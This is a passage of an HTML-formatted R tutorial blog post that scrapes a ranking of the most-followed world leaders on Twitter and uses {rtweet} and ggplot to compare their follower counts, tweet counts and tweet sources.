&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-which-world-leaders-are-twitter-bots"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-the-tweets"&gt;Getting the tweets&lt;/h2&gt;
&lt;p&gt;So, I could just write the names of twitter’s 10 most followed world leaders, but what would be the fun in that? We’re going to scrape them from &lt;a href="https://twiplomacy.com/ranking/the-50-most-followed-world-leaders-in-2017/" rel="external"&gt;twiplomacy&lt;/a&gt; using {rvest} and a chrome extension called selector gadget:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world_leaders &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_html&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://twiplomacy.com/ranking/the-50-most-followed-world-leaders-in-2017/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world_leaders &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_nodes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.ranking-entry .ranking-user-name&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_text&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_replace_all&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;\\t|\\n|@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(lead_r)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;realdonaldtrump&amp;#34; &amp;#34;pontifex&amp;#34; &amp;#34;narendramodi&amp;#34; &amp;#34;pmoindia&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;potus&amp;#34; &amp;#34;whitehouse&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The string inside &lt;code&gt;html_nodes()&lt;/code&gt; is gathered using selector gadget. See this &lt;a href="http://blog.rstudio.com/2014/11/24/rvest-easy-web-scraping-with-r/" rel="external"&gt;great tutorial&lt;/a&gt; on {rvest} and for more on selector gadget read &lt;code&gt;vignette(&amp;quot;selectorgadget&amp;quot;)&lt;/code&gt;. Tabs (&lt;code&gt;\t&lt;/code&gt;) and linebreaks (&lt;code&gt;\n&lt;/code&gt;) are removed with &lt;code&gt;str_replace_all()&lt;/code&gt; from the {stringr} package.&lt;/p&gt;
&lt;p&gt;Now we can collect the twitter data using {rtweet}. We can use the function &lt;code&gt;lookup_users()&lt;/code&gt; to grab basic user info such as number of tweets, friends, favourites and followers. Obviously analysing all 50 leaders at once would be a pain. So we’re only going to take the top 10 (&lt;em&gt;&lt;strong&gt;WARNING&lt;/strong&gt;&lt;/em&gt;: this could take a while)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lookup_users&lt;/span&gt;(lead_r[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_info
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 10 x 20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user_id name screen_name location description url protected&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;lgl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 25073877 Donal… realDonaldT… Washing… 45th President o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 5007043… Pope … Pontifex Vatican… Welcome to the o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 18839785 Naren… narendramodi India Prime Minister o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4717417… PMO I… PMOIndia &amp;#34;India &amp;#34; Office of the Pr… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 8222156… Presi… POTUS Washing… 45th President o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 8222156… The W… WhiteHouse Washing… Welcome to @Whit… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 68034431 Recep… RT_Erdogan Ankara,… Türkiye Cumhurba… &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2196174… Sushm… SushmaSwaraj New Del… Minister of Exte… &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 3669871… Joko … jokowi Jakarta Akun resmi Joko … &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 44335525 HH Sh… HHShkMohd Dubai, … Official Tweets … http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 13 more variables: followers_count &amp;lt;int&amp;gt;, friends_count &amp;lt;int&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # listed_count &amp;lt;int&amp;gt;, statuses_count &amp;lt;int&amp;gt;, favourites_count &amp;lt;int&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # account_created_at &amp;lt;dttm&amp;gt;, verified &amp;lt;lgl&amp;gt;, profile_url &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_expanded_url &amp;lt;chr&amp;gt;, account_lang &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_banner_url &amp;lt;chr&amp;gt;, profile_background_url &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_image_url &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We only want the columns of interest (name, followers_count, friends_count, statuses_count and favourites_count) and then we want the data in long format. To do this we’re going to use &lt;code&gt;select()&lt;/code&gt; and &lt;code&gt;gather()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, followers_count, friends_count, statuses_count, favourites_count, screen_name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;screen_name))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 40 x 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## name screen_name type value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Donald J. Trump realDonaldTrump followers_count 48426576&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Pope Francis Pontifex followers_count 16858642&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Narendra Modi narendramodi followers_count 40710139&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 PMO India PMOIndia followers_count 25156203&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 President Trump POTUS followers_count 22324998&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 The White House WhiteHouse followers_count 16713369&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 Recep Tayyip Erdoğan RT_Erdogan followers_count 12513987&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 Sushma Swaraj SushmaSwaraj followers_count 11461412&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 Joko Widodo jokowi followers_count 9693534&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 HH Sheikh Mohammed HHShkMohd followers_count 8764455&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 30 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can use the fantastic {ggplot} to plot the respective counts for each world leader&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_info,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value,fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="twitter-world-leader-overview.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Notice Donald &lt;em&gt;trumps&lt;/em&gt; everyone in the followers and status area (from what I here he’s quite a prevalent tweeter), however Sushma Swaraj and Narendra Modi trump everyone when it comes to favourites and friends respectively.&lt;/p&gt;
&lt;p&gt;Now, we’re going to use the function &lt;code&gt;get_timelines()&lt;/code&gt; to retrieve the last 2000 tweets by each leader. Again this may take a while!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_tl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_timelines&lt;/span&gt;(lead_r, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Unfortunately &lt;code&gt;get_timelines()&lt;/code&gt; only gives us their twitter handle and doesn’t return their actual name. So I’m going to use &lt;code&gt;select()&lt;/code&gt; and &lt;code&gt;left_join()&lt;/code&gt; to add the column of names to make for easier reading on the upcoming graphs&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(lead_r_info, name, screen_name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(lead_r_tl, names, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;screen_name&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;get_timelines()&lt;/code&gt; gives us the source of a persons tweet, i.e. iPhone, iPad, Android etc. So, what is the post popular tweet source among world leaders?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(source, n), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cornflowerblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tweet sources for world leaders&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n), hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-11-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Either world leaders really love iPhones or their social media / security teams do. Probably the latter. I can hear you all begging the question, using which source is more likely to give a world leader more retweets and favourites? To do this we’re going to summarise each source by it’s mean number of retweets and favourites and then gather the data into a long format for plotting&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(Retweet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count), Favourite &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type,value,&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
